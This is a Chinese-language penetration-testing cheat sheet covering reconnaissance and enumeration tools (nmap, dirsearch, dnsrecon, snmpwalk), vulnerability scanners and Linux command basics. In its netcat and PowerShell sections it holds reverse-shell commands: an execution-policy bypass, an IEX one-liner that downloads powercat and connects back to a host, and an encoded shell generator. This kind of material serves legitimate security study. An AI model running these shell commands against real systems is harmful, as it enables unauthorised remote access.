分类： 渗透

下面以x86架构为例

缓存结构

x86架构的计算机最多可管理4GB内存

堆栈

堆栈内存是以LIFO结构被CPU访问（Last-In,First-Out）
函数返回时需要读取返回地址
会存在堆栈溢出操作

CPU寄存器

x86寄存器指令为32位，4个字节，首个字节为操作符
EBP基指针（访问堆栈）<–一般来说程序访问临时变量就在这里
EIP指令指针（命令跳转）<–覆盖这个指令指针可以执行任意指令

Immunity Debugger

一个二进制程序调试器
可以通过断点等方式，跟踪程序执行过程，利用某些EIP指针实现命令执行

TODO:实操

基本信息收集

在没有明确目标之前可以通过扫描器等形式获取目标相关信息
信息主要如下：
1. 功能
2. 开发语言
3. 服务端软件

Web枚举

1. 识别目标系统技术栈
   a. 分析URL
   b. 浏览器信息
   c. 分析路由信息
   d. 相应头
2. 选择对应技术栈的攻击载荷
   a. 编程语言和框架
   b. Web服务器软件
   c. 数据库软件
   d. 服务器操作系统

路径枚举

dirb内建字典，默认递归发现隐藏路径

dirb <{URL}/{FILE}> [-r非递归] [-z {TIME_MS}延时] [-X {.TYPE}枚举指定后缀] 

dirsearch查找隐藏文件和目录

python3 dirsearch.py -u <URL> -e <EXTENSIONS> -w <WORDLIST> -t <THREADS> -r -f -x <EXCLUDE_STATUS_CODES> -b
-u, --url: 要扫描的目标 URL。
-e, --extensions: 要扫描的文件扩展名，以逗号分隔。例如，-e php,txt 表示要扫描 php 和 txt 文件。
-w, --wordlist: 要使用的字典文件路径。
-t, --threads: 使用的线程数。
-r, --recursive: 递归扫描子目录。
-f, --full-url: 显示完整的 URL。
-x, --exclude-status-codes: 要排除的 HTTP 状态码，以逗号分隔。例如，-x 404,403 表示要排除 404 和 403 状态码。
-b, --bruteforce: 对目录进行爆破。

Xray有爬虫功能的路径扫描

xray webscan --basic-crawler <HOST> [--html-output {FILE}.html]

更多功能可以通过配置config.yaml等方式实现
Xray教程可以在其仓库docs.xray.cool查看

常见漏洞

XSS漏洞

beef-xss
可用与xss漏洞利用，与shell类似在目标中执行一个hook.js的后门以便后续操作

目录遍历（文件包含）

获得对服务端文件的未授权访问权，例如Web应用根目录之外的文件
攻击者可修改文件路径，便利读取文件内容，文件包含漏洞可执行代码
常见文件
“`/etc/passwd“`或“`c:\boot.ini“`

SQL注入

不再赘述
【SQLI】SQLI攻击与防护

被动信息收集

Whois信息

域名公开信息

whois [HOST]
#信息查询
whois [IP]
#IP反查

Web查询
站长之家

搜索引擎过滤器

Google Hacking Database

site:[HOST] filetype:<TYPE>
ext:<TYPE>
intitle:"<NAME>"

DNS信息搜索服务

Netcraft英国互联网公司
微步在线

Recon-ng信息收集框架

命令行聚合信息收集框架，KEY需要自己设置

recon-ng
marketplace search github
marketplace info [MODULE]
marketplace install [MODULE/ALL]
modules load [MODULE]

gitleaks静态代码校验

gitleaks是一个用于检测和防止git仓库中硬编码的秘密（如密码，api密钥，令牌等）的SAST（静态应用程序安全测试）工具。gitleaks可以作为命令行工具，github动作，预提交钩子或任何CI/CD中的扫描器使用。

gitleaks detect -v
#检测当前目录或指定源，以详细模式输出结果

网络空间搜索引擎/网络空间测绘

Shodan网络空间搜索引擎
fofa网络空间测绘
ZoomEye
Censys

代理平台

SSL Server Test
分析当前服务器的SSL/TLS配置并识别相关漏洞

主动信息收集

DNS枚举

host查询/脚本爆破

host [-t {TYPE}] [HOST]
host [IP] #反向PTR记录
for ip in $(cat list); do host $.[HOST];done | grep -v "not found"
#usr/share/seclists有字典

dnsrecon/dnsenum爆破枚举

dnsrecon -d [HOST] -t axfr
dnsrecon -d [HOST] [-D {DICT}] -t brt
dnsrecon -bykwsad [HOST]
dnsenum [HOST]
dnsenum [HOST] [-f {DICT}]

端口扫描

简单扫描可以使用netcat

nc [-nvv禁用DNS解析并启用详细输出] [-w {TIME(1)}超时] [-z {-u扫描UDP端口}{IP} {PORT1-PORT2}扫描]
#端口扫描

namp扫描器

nmap [-sn/sS/sT/sU] [IP]
nmap -v -sn [IP] [-oG {FILE}]
#NMAP探活：-sn用Ping（ARP/ICMP）/-sS半开连接/-sT全连接（代理）/-sU用UDP扫描
namp [-p默认端口/-p-全端口/-p{NUM1-NUM2}指定端口段] [IP]
#端口扫描
namp [-sV版本探测] [-A高级扫描] [==script={NAME}插件可用通配符] [IP]
#版本探测/高级扫描/插件，与-p参数联动

masscan互联网大规模扫描

masscanf [-p{PORT}] [IP] [--rate={SPEED}速度] [-e {ETH}网卡] [--route-ip {IP}指定网关]

SMB枚举（PORT：NetBIOS u137/u138/139、SMB 445）

Is -1 /usr/share/nmap/scripts/smb
#SMB服务相关脚本

#可能会直接打穿

NFS枚举（PORT：111/2049）

NAMP用相关NFS工具查询后可以挂载一些nolock的NFS共享

mount -o nolock [REMOTE]:[REMOTE_DIR] [LOCAL_DIR]

如果有权限不对的话
“`ll“`查看相关权限PID，在本地添加用户，修改相关PID，su对应用户即可

SMTP枚举（PORT：25）

#nc -nv [IP] 25
VRFY [USER]
#存在225，不存在550

SNMP协议（PORT：u161）

用于管理和监控网络设备、无状态，基于UDP，1、2、2C流量不加密，默认弱口令public/private
snmpwalk也可以用nmap的插件做替代

onesixtyone [-c {DICT_FILE}] [-i {IP_FILE}]
#扫描整个网段
snmpwalk -c public -v1 [-t {TIME}超时] [IP]
#枚举整个MB树
snmpwalk -c public -v1 [IP] 1.3.6.1.4.1.77.1.2.25
#枚举Windows用户
snmpwalk -c public -v1 [IP] 1.3.6.1.2.1.25.4.2.1.2
#枚举进程
snmpwalk -c public -v1 [IP]1.3.6.1.2.1.6.13.1.3
#枚举TCP端口
snmpwalk -c public -v1 [IP] 1.3.6.1.2.1.25.6.3.1.2
#枚举软件列表

枚举工具

AutoRecon

漏洞扫描

探活->端口探测->服务发现->指纹匹配
漏扫软件
Acunetix | Web Application Security Scanner
Nessus Vulnerability Assessment
Goby – Attack surface mapping
GVM Vulnerability Scanner

apt install gvm#安装
gvm-setup#设置
gvm-check-setup#验证
gvm-feed-update#更新
gvm-start#启动
gvm-stop#停止

Nikto（APT安装）
Nikto 是一款常用的 Web 服务器漏洞扫描工具，可以帮助用户快速发现 Web 服务器中存在的安全问题。本文将详细介绍 Nikto 的使用方法，包括安装、配置和基本操作等。

nikto -h [URL]
#-h：指定扫描的目标网站。
#-p：指定要扫描的端口号。
#-ssl：指定使用 SSL 连接扫描。
#-C all：启用所有的检测选项。
#-output：指定扫描结果输出的文件名。
=

NATCAT(NC)

TCP/UDP连接和数据传输工具

nc [-nv连接-nvlp监听] [-e '/bin/bash'/'cmd.exe'远程shell] [HOST] [-p {PORT}监听]
-l：监听模式，用于创建一个服务器端口并等待客户端连接。
-u：使用UDP协议而不是TCP协议。
-z：扫描模式，只扫描开放的端口，不发送任何数据。
-v：详细模式，显示更多的信息。
-w：超时时间，设置连接或读写操作的超时时间（秒）。
-n：不进行DNS解析，直接使用IP地址。
-e：执行命令，将输入和输出重定向到指定的命令。
-p：源端口号，指定本地主机的源端口号。
-s：源IP地址，指定本地主机的源IP地址。

Socat

加密shell，支持证书加密，本质上和nc一致，躲避IPS和IDS

IPS和IDS是两种常用的网络安全设备，它们的目的是监测和防御网络中的入侵行为，保护网络资源的机密性、完整性和可用性。
IPS是入侵防御系统（Intrusion Prevention System），它是一种主动的安全控制设备，它工作在网络层或应用层，通过在网络间相互连接的设备上加载允许、禁止来自某些特定的源地址、目的地址、TCP端口号等规则，对通过设备的数据包进行检查，并根据内置的入侵知识库，对数据包进行深度分析，如果发现潜在的攻击行为，可以立即采取阻断、丢弃、重置等措施，阻止攻击进入内部网络。
IDS是入侵检测系统（Intrusion Detection System），它是一种被动的安全监测设备，它工作在网络层或应用层，通过在网络上被动地、无声息地收集它所关心的报文，对收集来的报文提取相应的流量统计特征值，并利用内置的入侵知识库，与这些流量特征进行智能分析比较匹配，如果发现可疑的活动或攻击行为，可以根据相应的配置进行报警或进行有限度的反击。
IPS和IDS的区别在于，IPS是一种主动防御设备，可以实时阻止入侵行为，而IDS是一种被动监测设备，只能发现入侵行为并报警。
IPS和IDS各有优缺点，适用于不同的场景。IPS比较适合部署在网络边界，抵御来自外部的攻击，而IDS比较适合部署在网络内部，监控整个网络安全状况。

Powershell

Get-ExecutionPolicy
#查看现有策略（默认为restricted,不信任ps1脚本运行）
Set-ExecutionPolicy Unrestricted
#将策略设置为不限制
powershell -exec bypass -c "COMMAND"
#绕过现有执行策略
powershell -c "(new-object System.Net.WebClient).DownloadFile('[URL],'[TARGET]')"
#通过dot.net下载文件
powershell IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c [HOST] [-p {PORT}] -e cmd
#简单的反弹shell，需要加载ps1文件（Powershell版本的Netcat）

#TODO:一句话
powercatc -c [HOST] [-p {PORT}] -e cmd.exe [-g生成反弹shell代码/e用base64加密] > reverseshell.ps1
powershell.exe -E [ENCODEDSHELL]
#powercat生成反弹shell

Wireshark

dumpcap实现，默认root/wireshark组可用，所以要添加用户进wireshark用户组，允许用户在所有网卡抓包

sudo usermod -aG wireshark $USER

搜索Flag位上PUSH的值
“`tcp.flags.push==1“`即有信息传输

tcpdump

命令行感觉还是不如wireshark，除了能写脚本自动化

tcpdump [-r FILE]
tcpdump [-n跳过DNS解析/X以16进制显示/A省略包头] [-r FILE] awk-F " " '{print $5)'| sort | uniq -c | head
tcpdump [-nXA] [src host {HOST}源端口] [-r FILE]
tcpdump [-nXA] [dst host {HOST}目标端口] [-r FILE]
tcpdump [-nXA] [port {PORT}] [-r FILE]

bash

bash脚本编写

#!/bin/bash
#声明解析器
[KEY]=[VALUE]
[KEY]=$(COMMAND) / `COMMAND`
[KEY1]='STRING'
[KEY2]="$KEY1"
#定义变量
$0 #脚本文件名自己
$1-$9 #Bash脚本的前9个参数
$# #传递给Bash脚本的参数数量
$@ #传递给Bash脚本的所有参数
$? #最近运行的程序的退出状态
$USER #运行脚本的用户的用户名
$HOSTNAME #计算机的主机名
$RANDOM #生成个随机数
$LINENO #今脚本中的当前行号
#特殊变量
read [-p 'TOPIC'] [-s安全输入] [KEY]
#读入变量
if (!)[<EXPRESSION1>] (&&)/(||) [<EXPRESSION1>]
then
    <ACTION1>
elif [<EXPRESSION2>]
then
    <ACTION3>
else
    <ACTION3>
fi
-n STRING #长度大于零
-z STRING #长度等于零
STRING1 [!]= STRING2 #字符串判断
INTEGER1 [-eq/ne/gt/lt/ge/le] INTEGER2 #e表示等于，g(reat)大于，l(ess)小于，n(o)不
[-d存在目录/e存在/r可读/s不为空/w可写/x可执行] FILE #目录/文件
#条件判断
for var_name in <list>
do
    <ACTION>
done
#FOR循环
while [<EXPRESSION>]
do
    <ACTION>
done
#WHILE循环
function func_name{
    <ACTION>
}
func_name(){
    <ACTION>
}
#函数

查询指令的若干方法

1. tldr
   too long don’t read

tldr [command]
tldr --update

2. man系统手册

man [-k]/[N] [command]

3. which/whereis/whatis/locate
   查询指令所在目录，如果不存在可以先执行
   “`updatedb“`更新文件目录

systemctl

启用或关闭系统服务

systemctl start/enable/stop/disable [service]

列出所有服务

systemctl list-unit-files

ss

查询所有tcp套接字

ss -anltp

ENV

$SHELL #使用的shell类型
$USER #当前用户
$PWD #当前目录
$PATH #程序目录
$$ #当前shell的pid
export a=b #定义全局环境变量
env #查看所有环境变量

管道(|)&重定向(><)

1. 标准输入(STDIN-O)：向程序输入数据
   

   <从某文件输入

2. 标准输出(STDOUT-1)：程序的输出（默认输出到当前终端）
   

   > 输出到某文件
   >>追加输出到某文件

3. 标准报错(STDERR-2)：报错消息（默认输出到当前终端）
   

   \2>/dev/null将错误输出丢弃

4. 管道[command1] | [command2]
   

   指令1的标准输出传输至指令2的标准输入

grep

grep [-R递归搜索] [-i忽略大小写] [-E正则表达式] [目标] [目录/文件]

find

find [目录] [-regex '正则表达式']

sed

替换

sed [-i替换文件] 's/REPLACE/TARGET/g' [FILENAME(ONLY -i)]

cut/awk

内容提取单个分隔符

cut [-d '分隔符'（单个字符）] [-f NUM（取第NUM部分）]

多个字符

awf [-F "分隔符"] '{print $NUM1"\n"$NUM2}'（输出格式）

sort/uniq

去除重复的

sort -u

倒序排序

sort -run

去重并且显示数量

uniq -c

openssl

生成Linux用户密码

openssl passwd [-1 MD5加密] [PASSWORD]

comm

comm，分别会显示A B AB

comm [-123 不显示哪些行数] [file1] [file2]

diff

diff [-c上下文格式] [-u统一格式] [file1] [file2]

vimdiff交互界面

vimdiff [file1] [file2]

ps

ps [-e所有进程] [-f全部格式]
ps [aux（显示BSD格式）]

kill

kill [-9强制kill] [pid]

tail

tail [-f实时监控] [-n NUM（显示结尾NUM行）] [file]

wget/curl/axel

wget支持http/https/ftp

wget -O [NEW_NAME] [URL]

curl支持IMAP/S,POP3/S,SCP,SFTP,SMB/S,SMTP/S,TELNET,TFTP,执行下载、上传等操作

curl -o [NEW_NAME] [URL]

axel支持FTP/HTTP加速下载，分片断点续传

axel -a [-n NUM（分片NUM）] -o [NEW_NAME] [URL]

alias

别名，重复指令简化
例如将
“`lsa“`设置为“`ls -la“`

alias lsa='ls -la'
unalias lsa

别名持久化
“`/etc/bash.bashrc“`和“`~/.bashrc“`

文件属性

查看文件属性

lsattr

修改属性（只需要可写）

chattr [-i修改只读i属性]